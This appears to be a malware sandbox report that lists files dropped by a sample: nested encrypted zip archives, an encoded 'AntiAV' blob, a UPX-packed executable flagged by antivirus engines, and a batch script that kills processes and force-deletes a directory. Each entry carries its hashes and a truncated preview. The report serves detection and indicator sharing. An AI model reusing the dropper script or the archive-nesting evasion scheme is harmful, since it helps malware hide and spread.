                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\main\KillDuplicate.cmd

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):222
                                                                                                                                                                                                                                                                          Entropy (8bit):4.855194602218789
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
                                                                                                                                                                                                                                                                          MD5:68CECDF24AA2FD011ECE466F00EF8450
                                                                                                                                                                                                                                                                          SHA1:2F859046187E0D5286D0566FAC590B1836F6E1B7
                                                                                                                                                                                                                                                                          SHA-256:64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
                                                                                                                                                                                                                                                                          SHA-512:471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\main\extracted\AntiAV.data

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2355713
                                                                                                                                                                                                                                                                          Entropy (8bit):5.891648193754473
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24576:5yZBPkpRrP9pxC+XvoflcYy36s3vb0EecYy37n92k8GtGAQZ67hR7krC/Cyf0/xO:R9kqGu7okoZscCnf0/Zs9p
                                                                                                                                                                                                                                                                          MD5:579A63BEBCCBACAB8F14132F9FC31B89
                                                                                                                                                                                                                                                                          SHA1:FCA8A51077D352741A9C1FF8A493064EF5052F27
                                                                                                                                                                                                                                                                          SHA-256:0AC3504D5FA0460CAE3C0FD9C4B628E1A65547A60563E6D1F006D17D5A6354B0
                                                                                                                                                                                                                                                                          SHA-512:4A58CA0F392187A483B9EF652B6E8B2E60D01DAA5D331549DF9F359D2C0A181E975CF9DF79552E3474B9D77F8E37A1CF23725F32D4CDBE4885E257A7625F7B1F
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\main\extracted\file_1.zip

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1799594
                                                                                                                                                                                                                                                                          Entropy (8bit):7.99773141173711
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:49152:8yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ+:tj13Trb6i5iGmuXZTbBizt0Jhc
                                                                                                                                                                                                                                                                          MD5:5659EBA6A774F9D5322F249AD989114A
                                                                                                                                                                                                                                                                          SHA1:4BFB12AA98A1DC2206BAA0AC611877B815810E4C
                                                                                                                                                                                                                                                                          SHA-256:E04346FEE15C3F98387A3641E0BBA2E555A5A9B0200E4B9256B1B77094069AE4
                                                                                                                                                                                                                                                                          SHA-512:F93ABF2787B1E06CE999A0CBC67DC787B791A58F9CE20AF5587B2060D663F26BE9F648D116D9CA279AF39299EA5D38E3C86271297E47C1438102CA28FCE8EDC4
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:PK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./..t?......6FU....;2].@...z..8..K^B/W..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\main\extracted\file_2.zip

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1799748
                                                                                                                                                                                                                                                                          Entropy (8bit):7.997729415613798
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:49152:5yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ/:4j13Trb6i5iGmuXZTbBizt0Jhl
                                                                                                                                                                                                                                                                          MD5:5404286EC7853897B3BA00ADF824D6C1
                                                                                                                                                                                                                                                                          SHA1:39E543E08B34311B82F6E909E1E67E2F4AFEC551
                                                                                                                                                                                                                                                                          SHA-256:EC94A6666A3103BA6BE60B92E843075A2D7FE7D30FA41099C3F3B1E2A5EBA266
                                                                                                                                                                                                                                                                          SHA-512:C4B78298C42148D393FEEA6C3941C48DEF7C92EF0E6BAAC99144B083937D0A80D3C15BD9A0BF40DAA60919968B120D62999FA61AF320E507F7E99FBFE9B9EF30
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:PK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\main\extracted\file_3.zip

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1799902
                                                                                                                                                                                                                                                                          Entropy (8bit):7.997726708945573
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:49152:Cyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJV:nj13Trb6i5iGmuXZTbBizt0Jh3
                                                                                                                                                                                                                                                                          MD5:5EB39BA3698C99891A6B6EB036CFB653
                                                                                                                                                                                                                                                                          SHA1:D2F1CDD59669F006A2F1AA9214AEED48BC88C06E
                                                                                                                                                                                                                                                                          SHA-256:E77F5E03AE140DDA27D73E1FFE43F7911E006A108CF51CBD0E05D73AA92DA7C2
                                                                                                                                                                                                                                                                          SHA-512:6C4CA20E88D49256ED9CABEC0D1F2B00DFCF3D1603B5C95D158D4438C9F1E58495F8DFA200DBE7F49B5B0DD57886517EB3B98C4190484548720DAD4B3DB6069E
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:PK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\main\extracted\file_4.zip

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1800056
                                                                                                                                                                                                                                                                          Entropy (8bit):7.997723543142523
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:49152:Zyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJQ:Yj13Trb6i5iGmuXZTbBizt0Jhm
                                                                                                                                                                                                                                                                          MD5:7187CC2643AFFAB4CA29D92251C96DEE
                                                                                                                                                                                                                                                                          SHA1:AB0A4DE90A14551834E12BB2C8C6B9EE517ACAF4
                                                                                                                                                                                                                                                                          SHA-256:C7E92A1AF295307FB92AD534E05FBA879A7CF6716F93AEFCA0EBFCB8CEE7A830
                                                                                                                                                                                                                                                                          SHA-512:27985D317A5C844871FFB2527D04AA50EF7442B2F00D69D5AB6BBB85CD7BE1D7057FFD3151D0896F05603677C2F7361ED021EAC921E012D74DA049EF6949E3A3
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:PK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\main\extracted\file_5.zip

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1800210
                                                                                                                                                                                                                                                                          Entropy (8bit):7.997720745184939
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:49152:ayj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJw:Pj13Trb6i5iGmuXZTbBizt0JhG
                                                                                                                                                                                                                                                                          MD5:B7D1E04629BEC112923446FDA5391731
                                                                                                                                                                                                                                                                          SHA1:814055286F963DDAA5BF3019821CB8A565B56CB8
                                                                                                                                                                                                                                                                          SHA-256:4DA77D4EE30AD0CD56CD620F4E9DC4016244ACE015C5B4B43F8F37DD8E3A8789
                                                                                                                                                                                                                                                                          SHA-512:79FC3606B0FE6A1E31A2ECACC96623CAF236BF2BE692DADAB6EA8FFA4AF4231D782094A63B76631068364AC9B6A872B02F1E080636EBA40ED019C2949A8E28DB
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:PK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\main\extracted\file_6.zip

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1800364
                                                                                                                                                                                                                                                                          Entropy (8bit):7.997716835838842
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:49152:kyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJv:lj13Trb6i5iGmuXZTbBizt0Jht
                                                                                                                                                                                                                                                                          MD5:0DC4014FACF82AA027904C1BE1D403C1
                                                                                                                                                                                                                                                                          SHA1:5E6D6C020BFC2E6F24F3D237946B0103FE9B1831
                                                                                                                                                                                                                                                                          SHA-256:A29DDD29958C64E0AF1A848409E97401307277BB6F11777B1CFB0404A6226DE7
                                                                                                                                                                                                                                                                          SHA-512:CBEEAD189918657CC81E844ED9673EE8F743AED29AD9948E90AFDFBECACC9C764FBDBFB92E8C8CEB5AE47CEE52E833E386A304DB0572C7130D1A54FD9C2CC028
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:PK........n..Y..+..x...x......file_5.zipPK........n..Yab..xw..xw......file_4.zipPK........n..Y....v...v......file_3.zipPK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\main\extracted\file_7.zip

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):3473559
                                                                                                                                                                                                                                                                          Entropy (8bit):7.9992359395959935
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:98304:8aR3D0Ae5mwdkDWm1Xo4j13Trb6i5iGmuXZTbBizt0Jhd:ds5m6sXoArb6iguZnBi5Qd
                                                                                                                                                                                                                                                                          MD5:CEA368FC334A9AEC1ECFF4B15612E5B0
                                                                                                                                                                                                                                                                          SHA1:493D23F72731BB570D904014FFDACBBA2334CE26
                                                                                                                                                                                                                                                                          SHA-256:07E38CAD68B0CDBEA62F55F9BC6EE80545C2E1A39983BAA222E8AF788F028541
                                                                                                                                                                                                                                                                          SHA-512:BED35A1CC56F32E0109EA5A02578489682A990B5CEFA58D7CF778815254AF9849E731031E824ADBA07C86C8425DF58A1967AC84CE004C62E316A2E51A75C8748
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:PK........n..Y`.T......#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..|...$..}.`..8......lV1*..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T....*..A..|...{A.p{.b*.|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.|.g....&.d..Y.|..5O...s.|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\main\extracted\in.exe

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1827328
                                                                                                                                                                                                                                                                          Entropy (8bit):7.963282633529333
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
                                                                                                                                                                                                                                                                          MD5:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                                                                          SHA1:D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
                                                                                                                                                                                                                                                                          SHA-256:46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
                                                                                                                                                                                                                                                                          SHA-512:044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\main\file.bin

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exe
                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):3473725
                                                                                                                                                                                                                                                                          Entropy (8bit):7.999948676888215
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
                                                                                                                                                                                                                                                                          MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                                                                                                                                          SHA1:0387715B6681D7097D372CD0005B664F76C933C7
                                                                                                                                                                                                                                                                          SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
                                                                                                                                                                                                                                                                          SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\main\file.zip (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):3473725
                                                                                                                                                                                                                                                                          Entropy (8bit):7.999948676888215
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
                                                                                                                                                                                                                                                                          MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                                                                                                                                          SHA1:0387715B6681D7097D372CD0005B664F76C933C7
                                                                                                                                                                                                                                                                          SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
